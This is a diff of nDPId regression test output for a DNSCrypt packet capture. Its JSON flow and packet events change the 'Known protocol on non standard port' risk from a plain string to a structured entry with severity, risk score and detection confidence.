 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":283,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsRAAL0RhlAKAAABM56mYdyuAbsCCJzVB2ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsZAAL0Rhk4KAAABM56mYeuuAbsCCJzVB14BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsUgAL0Roo8KAAABM56mYbvBAbsGBA2TB2EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":287,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsUAub0Rx2IKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":287,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":946739317428,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739317428,"pkt":"ZmZmZmZmRERERERECABFAADXKhpAADMRgkAznqZhCgAAAQG7kKsAw\/s4B2KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="}
@@ -597,28 +597,28 @@
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":946739317431,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739317431,"pkt":"ZmZmZmZmRERERERECABFAADXKhtAADQRgT8znqZhCgAAAQG7uJkAw9NNB1+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAIc141AAL0RhaIKAAABsDjtq6L1AbsCCGC6smcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739317432,"pkt":"ZmZmZmZmRERERERECABFAADXKhxAADMRgj4znqZhCgAAAQG7s\/IAw9f2B12BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="}
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739317432,"pkt":"ZmZmZmZmRERERERECABFAADXKh5AADMRgjwznqZhCgAAAQG7664Aw6A5B16BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAQt4OLzm4x3OBnTPVYOyWbwQ07ZuPzfh5UHeUSDpkuLilk8PnzqIG19XCvUsQGZmTzZ+d2RjpSDvvlP\/+37YoDPjwKVuBVGSevZiWx3QxU\/Ww92uJXMr1\/GUOUVCxbO0A+PApW4FUZJwAAAAFfU6w6X1T9ug=="}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":946739317432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317432,"pkt":"REREREREZmZmZmZmCABFAAXc144gAL0RoeEKAAABsDjtq9cGAbsGBFSSsmQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":55046,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
